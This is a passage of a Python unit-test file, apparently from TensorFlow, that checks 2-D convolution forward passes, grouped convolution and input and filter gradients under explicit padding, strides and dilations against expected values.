padding=[[1, 0], [0, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DLotsPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 1, 1, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[3, 4], [4, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 1],
filter_in_sizes=[2, 2, 1, 3],
strides=[2, 1],
padding=[[3, 4], [4, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DExplicitPaddingWithDilations(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3])
def testConv2DExplicitPaddingWithLayoutOptimizer(self):
# Test with Grappler's layout optimizer, to ensure the layout optimizer
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1],
test_grappler_layout_optimizer=True)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3],
test_grappler_layout_optimizer=True)
  def _VerifyGroupConvFwd(self, tensor_in_sizes, filter_in_sizes, dilations,
                          strides, padding, data_format, dtype):
    """Verify grouped convolution against a per-group conv2d loop.

    Computes a single grouped nn_ops.conv2d (input depth a multiple of the
    filter's in_depth) and compares it to the concatenation of independent
    per-group convolutions over channel splits of the input and filter.

    Args:
      tensor_in_sizes: Input dimensions in NHWC order.
      filter_in_sizes: Filter dimensions [height, width, in_depth, out_depth];
        in_depth must evenly divide the input depth with quotient > 1.
      dilations: [row_dilation, col_dilation].
      strides: [row_stride, col_stride].
      padding: "SAME" or "VALID".
      data_format: "NHWC" or "NCHW".
      dtype: Element dtype for both operands.
    """
    tensor_in = self._CreateNumpyTensor(tensor_in_sizes)
    filter_in = self._CreateNumpyTensor(filter_in_sizes)
    # Number of groups is implied by the depth ratio; must divide exactly.
    num_groups = tensor_in_sizes[3] // filter_in_sizes[2]
    assert num_groups > 1 and \
        filter_in_sizes[2] * num_groups == tensor_in_sizes[3]
    with test_util.device(True):
      t1 = constant_op.constant(tensor_in, dtype=dtype)
      t2 = constant_op.constant(filter_in, dtype=dtype)
      strides = [1] + strides + [1]
      dilations = [1] + dilations + [1]
      if data_format == "NCHW":
        # Transpose operands and attrs; channels move to axis 1.
        t1 = test_util.NHWCToNCHW(t1)
        strides = test_util.NHWCToNCHW(strides)
        dilations = test_util.NHWCToNCHW(dilations)
        t1_splits = array_ops.split(t1, num_groups, axis=1)
      else:
        t1_splits = array_ops.split(t1, num_groups, axis=3)
      # Filters are split along out_depth regardless of data format.
      t2_splits = array_ops.split(t2, num_groups, axis=3)
      def MakeConv2d(inputs, filters):
        return nn_ops.conv2d(
            inputs,
            filters,
            strides,
            padding,
            dilations=dilations,
            data_format=data_format)
      group_conv = MakeConv2d(t1, t2)
      # Reference result: convolve each group separately, then concatenate
      # along the channel axis.
      group_conv_loop = array_ops.concat(
          [MakeConv2d(t1s, t2s) for t1s, t2s in zip(t1_splits, t2_splits)],
          axis=1 if data_format == "NCHW" else 3)
      results = self.evaluate([group_conv, group_conv_loop])
      tol_to_use = 1e-5
      self.assertAllClose(
          results[0], results[1], atol=tol_to_use, rtol=tol_to_use)
@test_util.run_in_graph_and_eager_modes
@test_util.run_cuda_only
def testConv2DGroupConvFwd(self):
for data_format in ["NHWC", "NCHW"]:
for dilation in [1, 2]:
for stride in [1, 2]:
self._VerifyGroupConvFwd([10, 32, 32, 16], [3, 3, 4, 8],
dilations=[dilation, dilation],
strides=[stride, stride],
padding="SAME",
data_format=data_format,
dtype=dtypes.float32)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testInputGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testFilterGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
def _RunAndVerifyBackpropInput(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
err,
dilations=(1, 1)):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
with test_util.device(use_gpu):
if len(input_sizes) == 4:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t0 = constant_op.constant(input_sizes, shape=[len(input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW((padding))
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertAllCloseAccordingToType(expected, value.flatten(), atol=1e-5)
  def _CompareBackpropInput(self, input_sizes, filter_sizes, output_sizes,
                            conv_strides, padding):
    """Checks conv2d_backprop_input is consistent across configurations.

    Evaluates the input gradient with random filter/output-gradient values
    under every (data_format, use_gpu) combination from GetTestConfigs()
    and asserts all results are close to the first one.

    Args:
      input_sizes: Input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Output-gradient dimensions in NHWC order.
      conv_strides: [row_stride, col_stride].
      padding: "SAME" or "VALID".
    """
    x1 = np.random.rand(*filter_sizes).astype(np.float32)
    x2 = np.random.rand(*output_sizes).astype(np.float32)
    def _GetVal(data_format, use_gpu):
      # Evaluates the gradient for one configuration, returned in NHWC.
      with test_util.device(use_gpu):
        if data_format == "NCHW":
          new_input_sizes = test_util.NHWCToNCHW(input_sizes)
        else:
          new_input_sizes = input_sizes
        t0 = constant_op.constant(new_input_sizes, shape=[len(new_input_sizes)])
        t1 = constant_op.constant(x1, shape=filter_sizes)
        t2 = constant_op.constant(x2, shape=output_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t2 = test_util.NHWCToNCHW(t2)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d_backprop_input(
            t0,
            t1,
            t2,
            strides=strides,
            padding=padding,
            data_format=data_format)
        if data_format == "NCHW":
          conv = test_util.NCHWToNHWC(conv)
        ret = self.evaluate(conv)
        self.assertShapeEqual(ret, conv)
        return ret
    values = []
    for (data_format, use_gpu) in GetTestConfigs():
      values.append(_GetVal(data_format, use_gpu))
    # All configurations must agree with the first within a loose tolerance.
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-2, atol=1e-2)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropInput(self):
expected_output = [1.0, 4.0, 4.0, 3.0, 10.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropInput(self):
expected_output = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInput(self):
expected_output = [
14.0, 32.0, 50.0, 100.0, 163.0, 226.0, 167.0, 212.0, 257.0, 122.0,
140.0, 158.0, 478.0, 541.0, 604.0, 437.0, 482.0, 527.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInputStride1x2(self):
expected_output = [
1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 7.0, 12.0, 11.0, 18.0, 15.0, 24.0, 12.0,
16.0, 15.0, 20.0, 18.0, 24.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropInput(self):
expected_output = [
1.0, 0.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 4.0, 0.0, 0.0, 0.0,
0.0, 0.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
@test_util.disable_xla("XLA requires input_sizes to be a 4D shape.")
def testConv2DInputSizesContainsOnlySpatialDimensionsBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[2, 2],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
  def _RunAndVerifyBackpropFilter(self,
                                  input_sizes,
                                  filter_sizes,
                                  output_sizes,
                                  strides,
                                  padding,
                                  expected,
                                  data_format,
                                  use_gpu,
                                  dilations=(1, 1),
                                  err=1e-5):
    """Runs conv2d_backprop_filter and compares the result to `expected`.

    Repeats the check for every dtype from self._DtypesToTest.

    Args:
      input_sizes: Input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Output-gradient dimensions in NHWC order.
      strides: [row_stride, col_stride].
      padding: "SAME"/"VALID" or a list of explicit [before, after] pads.
      expected: Flattened expected filter-gradient values.
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to place on GPU.
      dilations: [row_dilation, col_dilation].
      err: Maximum elementwise difference allowed.
    """
    x0 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    explicit_strides = [1] + strides + [1]
    new_padding = padding
    new_dilations = [1] + dilations + [1]
    if isinstance(new_padding, (list, tuple)):
      # Explicit padding: extend to 4-D with no batch/depth padding.
      new_padding = [(0, 0)] + new_padding + [(0, 0)]
    if data_format == "NCHW":
      explicit_strides = test_util.NHWCToNCHW(explicit_strides)
      new_dilations = test_util.NHWCToNCHW(new_dilations)
      if isinstance(padding, (list, tuple)):
        new_padding = test_util.NHWCToNCHW(new_padding)
    for dtype in self._DtypesToTest(use_gpu=use_gpu):
      with test_util.device(use_gpu):
        t0 = constant_op.constant(x0, shape=input_sizes, dtype=dtype)
        t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
        t2 = constant_op.constant(x2, shape=output_sizes, dtype=dtype)
        if data_format == "NCHW":
          t0 = test_util.NHWCToNCHW(t0)
          t2 = test_util.NHWCToNCHW(t2)
        conv = nn_ops.conv2d_backprop_filter(
            t0,
            t1,
            t2,
            strides=explicit_strides,
            padding=new_padding,
            dilations=new_dilations,
            data_format=data_format)
        value = self.evaluate(conv)
        self.assertShapeEqual(value, conv)
      tf_logging.debug("expected = %s", expected)
      tf_logging.debug("actual = %s", value)
      self.assertArrayNear(expected, value.flatten(), err)
  def _CompareBackFilter(self, input_sizes, filter_sizes, output_sizes,
                         conv_strides, padding):
    """Checks conv2d_backprop_filter is consistent across configurations.

    Evaluates the filter gradient with random input/output-gradient values
    under every (data_format, use_gpu) combination from GetTestConfigs()
    and asserts all results are close to the first one.

    Args:
      input_sizes: Input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Output-gradient dimensions in NHWC order.
      conv_strides: [row_stride, col_stride].
      padding: "SAME" or "VALID".
    """
    x0 = np.random.rand(*input_sizes).astype(np.float32)
    x2 = np.random.rand(*output_sizes).astype(np.float32)
    def _GetVal(data_format, use_gpu):
      # Evaluates the filter gradient for one configuration.
      with test_util.device(use_gpu):
        t0 = constant_op.constant(x0, shape=input_sizes)
        t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
        t2 = constant_op.constant(x2, shape=output_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t0 = test_util.NHWCToNCHW(t0)
          t2 = test_util.NHWCToNCHW(t2)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d_backprop_filter(
            t0,
            t1,
            t2,
            strides=strides,
            padding=padding,
            data_format=data_format)
        ret = self.evaluate(conv)
        self.assertShapeEqual(ret, conv)
        return ret
    values = []
    for (data_format, use_gpu) in GetTestConfigs():
      values.append(_GetVal(data_format, use_gpu))
    # All configurations must agree with the first.
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-4, atol=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropFilter(self):
expected = [5.0, 8.0, 14.0, 17.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropFilter(self):
expected = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DBackpropFilterWithEmptyInput(self):
expected = [0, 0, 0, 0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilter(self):
expected = [
17.0, 22.0, 27.0, 22.0, 29.0, 36.0, 27.0, 36.0, 45.0, 32.0, 43.0, 54.0,
37.0, 50.0, 63.0, 42.0, 57.0, 72.0, 62.0, 85.0, 108.0, 67.0, 92.0,
117.0, 72.0, 99.0, 126.0, 77.0, 106.0, 135.0, 82.0, 113.0, 144.0, 87.0,
120.0, 153.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilterStride1x2(self):
expected = [161.0, 182.0, 287.0, 308.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropFilter(self):
expected_output = [78.]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropFilter(self):
expected_output = [1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 4.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
  def _RunAndVerifyBackpropInputDilation(self, input_sizes, filter_sizes,
                                         output_sizes, strides, dilations,
                                         padding, data_format, use_gpu, err):
    """Checks dilated input gradients of conv2d against nn_ops.convolution.

    Differentiates both forward ops w.r.t. the input and asserts the two
    gradients agree within `err`. Non-default dilations only run with
    use_gpu=True.

    Args:
      input_sizes: Input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Unused here; kept for signature parity with the
        non-dilated verifiers.
      strides: [row_stride, col_stride].
      dilations: [row_dilation, col_dilation].
      padding: "SAME" or "VALID".
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU.
      err: Maximum elementwise difference allowed.
    """
    x1 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(filter_sizes)
    default_dilations = (dilations[0] == 1 and dilations[1] == 1)
    if default_dilations or use_gpu:
      # NOTE(review): `sess` is not used below; the context only sets the
      # session/device placement.
      with self.cached_session(use_gpu=use_gpu) as sess:
        if data_format == "NCHW":
          input_sizes = test_util.NHWCToNCHW(input_sizes)
        t1 = constant_op.constant(x1, shape=input_sizes)
        t2 = constant_op.constant(x2, shape=filter_sizes)
        full_strides = [1] + strides + [1]
        full_dilations = [1] + dilations + [1]
        if data_format == "NCHW":
          full_strides = test_util.NHWCToNCHW(full_strides)
          full_dilations = test_util.NHWCToNCHW(full_dilations)
        conv_forward = nn_ops.conv2d(
            t1,
            t2,
            strides=full_strides,
            dilations=full_dilations,
            padding=padding,
            data_format=data_format)
        conv_forward_2 = nn_ops.convolution(
            t1,
            t2,
            padding=padding,
            strides=strides,
            dilation_rate=dilations,
            data_format=data_format)
        if data_format == "NCHW":
          conv_forward = test_util.NCHWToNHWC(conv_forward)
          conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
        # Gradients of each forward op w.r.t. the input tensor t1.
        conv = gradients_impl.gradients(conv_forward, t1)[0]
        conv_2 = gradients_impl.gradients(conv_forward_2, t1)[0]
        value = self.evaluate(conv)
        value_2 = self.evaluate(conv_2)
        self.assertShapeEqual(value, conv)
        self.assertShapeEqual(value_2, conv_2)
      tf_logging.debug("expected = %s", value_2)
      tf_logging.debug("actual = %s", value)
      self.assertArrayNear(value_2.flatten(), value.flatten(), err)
def _RunAndVerifyBackpropFilterDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t2)[0]
conv_2 = gradients_impl.gradients(conv_forward, t2)[0]
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 4, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputDilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 2, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropInputDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
  def _RunAndVerifyBackpropInputExplicitPadding(self,
                                                input_sizes,
                                                filter_sizes,
                                                output_sizes,
                                                strides,
                                                padding,
                                                data_format,
                                                use_gpu,
                                                dilations=(1, 1),
                                                err=2e-5):
    """Verifies conv2d_backprop_input with explicit padding.

    Computes a reference gradient by running conv2d_backprop_input with
    VALID padding over a virtually padded input and slicing the pads back
    off, then delegates to _RunAndVerifyBackpropInput with the explicit
    `padding` to check the op produces the same values.

    Args:
      input_sizes: Unpadded input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Output-gradient dimensions in NHWC order.
      strides: [row_stride, col_stride].
      padding: Explicit spatial padding [[top, bottom], [left, right]].
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU; skipped if no CUDA GPU. Non-default
        dilations are only exercised on GPU.
      dilations: [row_dilation, col_dilation].
      err: Absolute tolerance passed through to the verifier.
    """
    if use_gpu and not test.is_gpu_available(cuda_only=True):
      return
    if not use_gpu and dilations != (1, 1):
      return  # Non-default dilations is not supported on the CPU.
    x1 = self._CreateNumpyTensor(filter_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    # Reference path: grow the input by the explicit pads, run VALID...
    padded_input_sizes = input_sizes[:]
    padded_input_sizes[1] += padding[0][0] + padding[0][1]
    padded_input_sizes[2] += padding[1][0] + padding[1][1]
    c = nn_ops.conv2d_backprop_input(
        padded_input_sizes,
        x1,
        x2,
        strides=[1] + strides + [1],
        padding="VALID",
        dilations=[1] + dilations + [1])
    # ...then slice the padded rows/cols back off the gradient.
    c = c[:, padding[0][0]:(c.shape[1] - padding[0][1]), padding[1][0]:(
        c.shape[2] - padding[1][1]), :]
    expected = list(self.evaluate(array_ops.reshape(c, [-1])))
    self._RunAndVerifyBackpropInput(
        input_sizes,
        filter_sizes,
        output_sizes,
        strides,
        padding,
        expected,
        data_format,
        use_gpu=use_gpu,
        err=err,
        dilations=dilations)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
